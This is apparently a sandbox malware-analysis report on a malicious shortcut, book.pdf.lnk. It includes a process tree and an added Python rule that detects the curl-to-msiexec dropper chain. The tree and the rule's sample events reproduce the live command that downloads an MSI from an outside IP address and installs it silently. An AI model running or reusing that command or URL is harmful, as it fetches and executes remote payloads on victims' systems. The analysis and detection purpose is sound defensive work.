Resubmissions
date              task ID              score
24-08-2023 17:35  230824-v568qafh4y    3
23-08-2023 19:18  230823-xz2gdsfa82    3
23-08-2023 19:16  230823-xy925sfa76    3
21-08-2023 09:54  230821-lw62xscb47    10
21-08-2023 00:59  230821-bb4qysaa78    10

Analysis
- max time kernel: 30s
- max time network: 35s
- platform: windows10-2004_x64
- resource: win10v2004-20230703-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-08-2023 19:16
Static task: static1
Behavioral task: behavioral1 (sample: book.pdf.lnk, resource: win7-20230712-en)
Behavioral task: behavioral2 (sample: book.pdf.lnk, resource: win10v2004-20230703-en)
General
- Target: book.pdf.lnk
- Size: 1KB
- MD5: 0185e0fc2f505312001e1a65e6783908
- SHA1: 8e4cf0397ba32d233a515a5aca02751f6f9344c6
- SHA256: 8b3162141ac545fa0ae63777748973b8ee88bb8234a917d5fb3238d2c2ca963d
- SHA512: 1a484bb08401fd7476d37029fa753aa82af10aa702f30fa30568ff7eaf94b484e604bbff9f6b5a67179a7d708cf61bb767fa974e0a9f35e751d74d9a2dd4fefc
Malware Config
Signatures
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of AdjustPrivilegeToken (32 IoCs)
  Processes: msiexec.exe, msiexec.exe
  description                               pid   process
  Token: SeShutdownPrivilege                4248  msiexec.exe
  Token: SeIncreaseQuotaPrivilege           4248  msiexec.exe
  Token: SeSecurityPrivilege                3056  msiexec.exe
  Token: SeCreateTokenPrivilege             4248  msiexec.exe
  Token: SeAssignPrimaryTokenPrivilege      4248  msiexec.exe
  Token: SeLockMemoryPrivilege              4248  msiexec.exe
  Token: SeIncreaseQuotaPrivilege           4248  msiexec.exe
  Token: SeMachineAccountPrivilege          4248  msiexec.exe
  Token: SeTcbPrivilege                     4248  msiexec.exe
  Token: SeSecurityPrivilege                4248  msiexec.exe
  Token: SeTakeOwnershipPrivilege           4248  msiexec.exe
  Token: SeLoadDriverPrivilege              4248  msiexec.exe
  Token: SeSystemProfilePrivilege           4248  msiexec.exe
  Token: SeSystemtimePrivilege              4248  msiexec.exe
  Token: SeProfSingleProcessPrivilege       4248  msiexec.exe
  Token: SeIncBasePriorityPrivilege         4248  msiexec.exe
  Token: SeCreatePagefilePrivilege          4248  msiexec.exe
  Token: SeCreatePermanentPrivilege         4248  msiexec.exe
  Token: SeBackupPrivilege                  4248  msiexec.exe
  Token: SeRestorePrivilege                 4248  msiexec.exe
  Token: SeShutdownPrivilege                4248  msiexec.exe
  Token: SeDebugPrivilege                   4248  msiexec.exe
  Token: SeAuditPrivilege                   4248  msiexec.exe
  Token: SeSystemEnvironmentPrivilege       4248  msiexec.exe
  Token: SeChangeNotifyPrivilege            4248  msiexec.exe
  Token: SeRemoteShutdownPrivilege          4248  msiexec.exe
  Token: SeUndockPrivilege                  4248  msiexec.exe
  Token: SeSyncAgentPrivilege               4248  msiexec.exe
  Token: SeEnableDelegationPrivilege        4248  msiexec.exe
  Token: SeManageVolumePrivilege            4248  msiexec.exe
  Token: SeImpersonatePrivilege             4248  msiexec.exe
  Token: SeCreateGlobalPrivilege            4248  msiexec.exe
- Suspicious use of WriteProcessMemory (6 IoCs)
  Processes: cmd.exe, cmd.exe
  description                       pid   process   target process
  PID 2288 wrote to memory of 3916  2288  cmd.exe   cmd.exe
  PID 2288 wrote to memory of 3916  2288  cmd.exe   cmd.exe
  PID 3916 wrote to memory of 3432  3916  cmd.exe   curl.exe
  PID 3916 wrote to memory of 3432  3916  cmd.exe   curl.exe
  PID 3916 wrote to memory of 4248  3916  cmd.exe   msiexec.exe
  PID 3916 wrote to memory of 4248  3916  cmd.exe   msiexec.exe
Processes
- C:\Windows\system32\cmd.exe (PID 2288)
  cmd /c C:\Users\Admin\AppData\Local\Temp\book.pdf.lnk
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe (PID 3916)
    "C:\Windows\System32\cmd.exe" /c echo %cd% > C:\Users\Admin\AppData\Local\Temp\ruta.txt & echo eGz & echo zv & echo GMp & echo RC & curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu & msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn
    Signatures: Suspicious use of WriteProcessMemory
    - C:\Windows\system32\curl.exe (PID 3432)
      curl -o C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi http://107.181.161.200:443/msiffbjzugu
    - C:\Windows\system32\msiexec.exe (PID 4248)
      msiexec /i C:\Users\Admin\AppData\Local\Temp\ffbjzugu.msi /quiet /qn
      Signatures: Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\msiexec.exe (PID 3056)
  C:\Windows\system32\msiexec.exe /V
  Signatures: Suspicious use of AdjustPrivilegeToken
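The process tree above is the whole attack chain in one cmd.exe line: the shortcut runs cmd.exe, which pads the command with throwaway echo statements, fetches a file into the user's Temp directory with the built-in curl.exe, and hands it straight to msiexec /i with /quiet /qn so no installer UI appears. The following detection is an added example and is not part of the sandbox report or the vendor's own rules. It correlates a curl.exe download into %LOCALAPPDATA%\Temp with a quiet msiexec install of the same file where the two processes share a parent (or one is the parent of the other), then walks the ancestry to recover the .lnk that started it. The event records are constructed from the PIDs and command lines in the tree; the record fields (pid, ppid, image, cmdline) are an assumption modelled on Sysmon Event ID 1, and the parent PIDs outside the tree and the final benign control event are invented.

```python
# Added example (not from the report): correlate process-creation events into the
# LNK -> cmd.exe -> curl.exe -> msiexec.exe chain shown in the process tree.
# Event fields (pid, ppid, image, cmdline) are an assumption modelled on Sysmon Event ID 1.
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


TEMP = r"C:\Users\Admin\AppData\Local\Temp"
URL = "http://107.181.161.200:443/msiffbjzugu"
SYS = r"C:\Windows\system32"

# Constructed sample: PIDs and command lines copied from the report's process tree.
# Parent PIDs outside the tree (1000, 700, 900) and the last event, a benign
# interactive install used as a negative control, are invented.
SAMPLE_EVENTS = [
    ProcEvent(2288, 1000, rf"{SYS}\cmd.exe", rf"cmd /c {TEMP}\book.pdf.lnk"),
    ProcEvent(3916, 2288, rf"{SYS}\cmd.exe",
              rf'"C:\Windows\System32\cmd.exe" /c echo %cd% > {TEMP}\ruta.txt & echo eGz & echo zv '
              rf"& echo GMp & echo RC & curl -o {TEMP}\ffbjzugu.msi {URL} & msiexec /i {TEMP}\ffbjzugu.msi /quiet /qn"),
    ProcEvent(3432, 3916, rf"{SYS}\curl.exe", rf"curl -o {TEMP}\ffbjzugu.msi {URL}"),
    ProcEvent(4248, 3916, rf"{SYS}\msiexec.exe", rf"msiexec /i {TEMP}\ffbjzugu.msi /quiet /qn"),
    ProcEvent(3056, 700, rf"{SYS}\msiexec.exe", rf"{SYS}\msiexec.exe /V"),
    ProcEvent(5100, 900, rf"{SYS}\msiexec.exe", r"msiexec /i C:\Users\Admin\Downloads\7z2301-x64.msi"),
]

TEMP_DIR_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
QUIET = {"/quiet", "/qn", "/q", "/qb"}


def _segments(cmdline: str) -> List[List[str]]:
    """Split a cmd.exe line on & && | || and tokenise each sub-command."""
    return [p.split() for p in re.split(r"\s*(?:&&|\|\||&|\|)\s*", cmdline) if p.strip()]


def _is_image(tok: str, name: str) -> bool:
    """True if a token (bare name or full path, optionally quoted) is name[.exe]."""
    return tok.strip('"').lower().rsplit("\\", 1)[-1] in (name, name + ".exe")


def parse_curl(tokens: List[str]) -> Optional[Tuple[str, str]]:
    """(output_path, url) for a curl invocation that writes to disk, else None."""
    if not tokens or not _is_image(tokens[0], "curl"):
        return None
    out = url = ""
    for i, tok in enumerate(tokens):
        if tok in ("-o", "--output") and i + 1 < len(tokens):
            out = tokens[i + 1].strip('"')
        elif tok.lower().startswith(("http://", "https://")):
            url = tok.strip('"')
    return (out, url) if out else None


def parse_msiexec(tokens: List[str]) -> Optional[Tuple[str, bool]]:
    """(package_path, is_quiet) for an msiexec install invocation, else None."""
    if not tokens or not _is_image(tokens[0], "msiexec"):
        return None
    pkg, quiet = "", False
    for i, tok in enumerate(tokens):
        if tok.lower() in ("/i", "-i", "/package") and i + 1 < len(tokens):
            pkg = tokens[i + 1].strip('"')
        elif tok.lower() in QUIET:
            quiet = True
    return (pkg, quiet) if pkg else None


def _lnk_ancestor(e: ProcEvent, by_pid: Dict[int, ProcEvent]) -> Optional[str]:
    """Walk up the parent chain and return the first .lnk path passed to cmd.exe."""
    pid, seen = e.ppid, set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        anc = by_pid[pid]
        if _is_image(anc.image, "cmd"):
            for tok in anc.cmdline.split():
                if tok.strip('"').lower().endswith(".lnk"):
                    return tok.strip('"')
        pid = anc.ppid
    return None


def find_lnk_dropper_chains(events: List[ProcEvent]) -> List[dict]:
    """Flag quiet msiexec installs of a file that curl.exe dropped into a user Temp
    directory, where the two processes are siblings or parent/child (shared cmd.exe /c)."""
    by_pid = {e.pid: e for e in events}
    downloads: Dict[str, Tuple[ProcEvent, str]] = {}  # lowercase output path -> (curl event, url)
    for e in events:
        if _is_image(e.image, "curl"):
            for seg in _segments(e.cmdline):
                hit = parse_curl(seg)
                if hit and TEMP_DIR_RE.search(hit[0]):
                    downloads[hit[0].lower()] = (e, hit[1])
    findings = []
    for e in events:
        if not _is_image(e.image, "msiexec"):
            continue
        for seg in _segments(e.cmdline):
            hit = parse_msiexec(seg)
            if not hit or not hit[1] or hit[0].lower() not in downloads:
                continue
            dl, url = downloads[hit[0].lower()]
            if dl.ppid != e.ppid and dl.pid != e.ppid:
                continue  # same file name but no process relationship
            findings.append({"msiexec_pid": e.pid, "downloader_pid": dl.pid,
                             "package": hit[0], "url": url,
                             "launched_from_lnk": _lnk_ancestor(e, by_pid)})
    return findings


if __name__ == "__main__":
    for finding in find_lnk_dropper_chains(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample, this reports exactly one chain: msiexec.exe 4248 installing the file that curl.exe 3432 fetched from the listed URL, launched from book.pdf.lnk. The msiexec /V service instance (3056) and the interactive install from Downloads are not flagged, because neither installs a file that curl just wrote into Temp with a quiet switch. The Downloads section of this report records only a 3-byte response for the fetch, so in this run msiexec had no valid package to install; the rule keys on the attempted chain, not on a successful install.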
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 3B
  MD5: 8a80554c91d9fca8acb82f023de02f11
  SHA1: 5f36b2ea290645ee34d943220a14b54ee5ea5be5
  SHA256: ca3d163bab055381827226140568f3bef7eaac187cebd76878e0b63e9e442356
  SHA512: ca4b6defb8adcc010050bc8b1bb8f8092c4928b8a0fba32146abcfb256e4d91672f88ca2cdf6210e754e5b8ac5e23fb023806ccd749ac8b701f79a691f03c87a